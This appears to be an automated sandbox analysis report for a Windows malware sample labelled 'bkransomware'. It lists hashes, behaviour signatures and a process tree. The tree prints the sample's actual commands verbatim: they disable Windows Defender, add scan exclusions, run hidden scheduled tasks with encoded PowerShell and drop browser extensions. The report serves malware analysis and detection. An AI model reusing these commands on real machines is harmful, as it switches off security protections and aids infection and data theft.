Analysis
-
max time kernel
92s -
max time network
94s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
27-05-2024 05:49
Static task
static1
Behavioral task
behavioral1
Sample
2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
Resource
win7-20240221-en
General
-
Target
2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe
-
Size
6.6MB
-
MD5
63f5795f3090d05b9165f4788e8cd0be
-
SHA1
e471234ef41fc7c15ee1213fb3b04f0b4bff05ba
-
SHA256
caedd9efb0758b3928fb4277c5a6a27e9989c6d3d03742adfdf83242fe29cb59
-
SHA512
f17d886adf196a79b7226d387e50497c6fd0cf0933bb885d7e2fd5bb448d131da95eb7724484aebfcb3a70cde0d2c68b7ead007a7f743d8cb3528856bda4b99a
-
SSDEEP
196608:lNZIJez06oDGWsY2C7KelsLeElAFnWVlo4439VQeWx:lN6e6uPCVlsLfqFnF4IQn
Malware Config
Signatures
-
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\uxsKyVOxFpVdyluD = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HCtEkPSKU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\uxsKyVOxFpVdyluD = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lOSXAGLcobUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GiPqhqLluuCEC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\aSRIytoBnSqU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\hduqDfvYrAfrHLVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXEpid process 1888 powershell.exe 1628 powershell.EXE 1684 powershell.EXE 2828 powershell.exe 1196 powershell.EXE -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
Processes:
2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pookachmhghnpgjhebhilcidgdphdlhi\1.0.0.0\manifest.json 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnhkdpgojldfpdigpinpjammegkfkekn\1.8_0\manifest.json 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe -
Drops file in System32 directory 9 IoCs
Processes:
powershell.exe2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXEdescription ioc process File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe File created C:\Windows\system32\GroupPolicy\gpt.ini 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Drops file in Program Files directory 13 IoCs
Processes:
2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exedescription ioc process File created C:\Program Files (x86)\aSRIytoBnSqU2\bTPwoUwOwygKu.dll 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe File created C:\Program Files\Mozilla Firefox\browser\features\{D8D101C7-1C16-4DF6-97DE-CD81AC16A495}.xpi 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{D8D101C7-1C16-4DF6-97DE-CD81AC16A495}.xpi 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe File created C:\Program Files (x86)\aSRIytoBnSqU2\FpXhoUA.xml 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe File created C:\Program Files (x86)\lOSXAGLcobUn\nFVXxco.dll 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe File created C:\Program Files (x86)\HCtEkPSKU\TwUOyK.dll 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe File created C:\Program Files (x86)\HCtEkPSKU\zVkbFST.xml 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe File created C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR\yuHZwHb.xml 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe File created C:\Program Files (x86)\GiPqhqLluuCEC\ewzBFbS.dll 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe File created C:\Program Files (x86)\GiPqhqLluuCEC\tKphAJs.xml 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe File created C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR\znWnvKO.dll 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\kuRaZQzPzSEXqOG.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2396 2780 WerFault.exe 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe -
Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1856 schtasks.exe 632 schtasks.exe 3000 schtasks.exe 2784 schtasks.exe 320 schtasks.exe 2232 schtasks.exe 2812 schtasks.exe 2120 schtasks.exe 2068 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 36 IoCs
Processes:
powershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXE2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exepid process 1888 powershell.exe 1888 powershell.exe 1888 powershell.exe 1628 powershell.EXE 1628 powershell.EXE 1628 powershell.EXE 1684 powershell.EXE 1684 powershell.EXE 1684 powershell.EXE 2828 powershell.exe 1196 powershell.EXE 1196 powershell.EXE 1196 powershell.EXE 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
powershell.exepowershell.EXEpowershell.EXEpowershell.exeWMIC.exepowershell.EXEdescription pid process Token: SeDebugPrivilege 1888 powershell.exe Token: SeDebugPrivilege 1628 powershell.EXE Token: SeDebugPrivilege 1684 powershell.EXE Token: SeDebugPrivilege 2828 powershell.exe Token: SeIncreaseQuotaPrivilege 1852 WMIC.exe Token: SeSecurityPrivilege 1852 WMIC.exe Token: SeTakeOwnershipPrivilege 1852 WMIC.exe Token: SeLoadDriverPrivilege 1852 WMIC.exe Token: SeSystemProfilePrivilege 1852 WMIC.exe Token: SeSystemtimePrivilege 1852 WMIC.exe Token: SeProfSingleProcessPrivilege 1852 WMIC.exe Token: SeIncBasePriorityPrivilege 1852 WMIC.exe Token: SeCreatePagefilePrivilege 1852 WMIC.exe Token: SeBackupPrivilege 1852 WMIC.exe Token: SeRestorePrivilege 1852 WMIC.exe Token: SeShutdownPrivilege 1852 WMIC.exe Token: SeDebugPrivilege 1852 WMIC.exe Token: SeSystemEnvironmentPrivilege 1852 WMIC.exe Token: SeRemoteShutdownPrivilege 1852 WMIC.exe Token: SeUndockPrivilege 1852 WMIC.exe Token: SeManageVolumePrivilege 1852 WMIC.exe Token: 33 1852 WMIC.exe Token: 34 1852 WMIC.exe Token: 35 1852 WMIC.exe Token: SeDebugPrivilege 1196 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exedescription pid process target process PID 2780 wrote to memory of 2424 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe cmd.exe PID 2780 wrote to memory of 2424 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe cmd.exe PID 2780 wrote to memory of 2424 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe cmd.exe PID 2780 wrote to memory of 2424 2780 2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe cmd.exe PID 2424 wrote to memory of 2440 2424 cmd.exe forfiles.exe PID 2424 wrote to memory of 2440 2424 cmd.exe forfiles.exe PID 2424 wrote to memory of 2440 2424 cmd.exe forfiles.exe PID 2424 wrote to memory of 2440 2424 cmd.exe forfiles.exe PID 2440 wrote to memory of 2444 2440 forfiles.exe cmd.exe PID 2440 wrote to memory of 2444 2440 forfiles.exe cmd.exe PID 2440 wrote to memory of 2444 2440 forfiles.exe cmd.exe PID 2440 wrote to memory of 2444 2440 forfiles.exe cmd.exe PID 2444 wrote to memory of 2480 2444 cmd.exe reg.exe PID 2444 wrote to memory of 2480 2444 cmd.exe reg.exe PID 2444 wrote to memory of 2480 2444 cmd.exe reg.exe PID 2444 wrote to memory of 2480 2444 cmd.exe reg.exe PID 2424 wrote to memory of 2484 2424 cmd.exe forfiles.exe PID 2424 wrote to memory of 2484 2424 cmd.exe forfiles.exe PID 2424 wrote to memory of 2484 2424 cmd.exe forfiles.exe PID 2424 wrote to memory of 2484 2424 cmd.exe forfiles.exe PID 2484 wrote to memory of 2540 2484 forfiles.exe cmd.exe PID 2484 wrote to memory of 2540 2484 forfiles.exe cmd.exe PID 2484 wrote to memory of 2540 2484 forfiles.exe cmd.exe PID 2484 wrote to memory of 2540 2484 forfiles.exe cmd.exe PID 2540 wrote to memory of 2544 2540 cmd.exe reg.exe PID 2540 wrote to memory of 2544 2540 cmd.exe reg.exe PID 2540 wrote to memory of 2544 2540 cmd.exe reg.exe PID 2540 wrote to memory of 2544 2540 cmd.exe reg.exe PID 2424 wrote to memory of 2556 2424 cmd.exe forfiles.exe PID 2424 wrote to memory of 2556 2424 cmd.exe forfiles.exe PID 2424 wrote to memory of 2556 2424 cmd.exe forfiles.exe PID 2424 wrote to memory of 2556 2424 cmd.exe forfiles.exe PID 2556 wrote to memory of 2496 2556 forfiles.exe cmd.exe PID 2556 wrote to memory of 2496 2556 forfiles.exe cmd.exe PID 2556 wrote to memory of 2496 2556 forfiles.exe cmd.exe PID 2556 wrote to memory of 2496 2556 forfiles.exe cmd.exe PID 2496 wrote to memory of 2608 2496 cmd.exe reg.exe PID 2496 wrote to memory of 2608 2496 cmd.exe reg.exe PID 2496 wrote to memory of 2608 2496 cmd.exe reg.exe PID 2496 wrote to memory of 2608 2496 cmd.exe reg.exe PID 2424 wrote to memory of 2592 2424 cmd.exe forfiles.exe PID 2424 wrote to memory of 2592 2424 cmd.exe forfiles.exe PID 2424 wrote to memory of 2592 2424 cmd.exe forfiles.exe PID 2424 wrote to memory of 2592 2424 cmd.exe forfiles.exe PID 2592 wrote to memory of 2604 2592 forfiles.exe cmd.exe PID 2592 wrote to memory of 2604 2592 forfiles.exe cmd.exe PID 2592 wrote to memory of 2604 2592 forfiles.exe cmd.exe PID 2592 wrote to memory of 2604 2592 forfiles.exe cmd.exe PID 2604 wrote to memory of 2560 2604 cmd.exe reg.exe PID 2604 wrote to memory of 2560 2604 cmd.exe reg.exe PID 2604 wrote to memory of 2560 2604 cmd.exe reg.exe PID 2604 wrote to memory of 2560 2604 cmd.exe reg.exe PID 2424 wrote to memory of 2432 2424 cmd.exe forfiles.exe PID 2424 wrote to memory of 2432 2424 cmd.exe forfiles.exe PID 2424 wrote to memory of 2432 2424 cmd.exe forfiles.exe PID 2424 wrote to memory of 2432 2424 cmd.exe forfiles.exe PID 2432 wrote to memory of 2528 2432 forfiles.exe cmd.exe PID 2432 wrote to memory of 2528 2432 forfiles.exe cmd.exe PID 2432 wrote to memory of 2528 2432 forfiles.exe cmd.exe PID 2432 wrote to memory of 2528 2432 forfiles.exe cmd.exe PID 2528 wrote to memory of 1888 2528 cmd.exe powershell.exe PID 2528 wrote to memory of 1888 2528 cmd.exe powershell.exe PID 2528 wrote to memory of 1888 2528 cmd.exe powershell.exe PID 2528 wrote to memory of 1888 2528 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-27_63f5795f3090d05b9165f4788e8cd0be_bkransomware.exe"1⤵
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggiEulQJn" /SC once /ST 03:17:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggiEulQJn"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggiEulQJn"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gGIDJBcfD" /SC once /ST 02:47:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gGIDJBcfD"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gGIDJBcfD"2⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"2⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:323⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:643⤵
- Windows security bypass
-
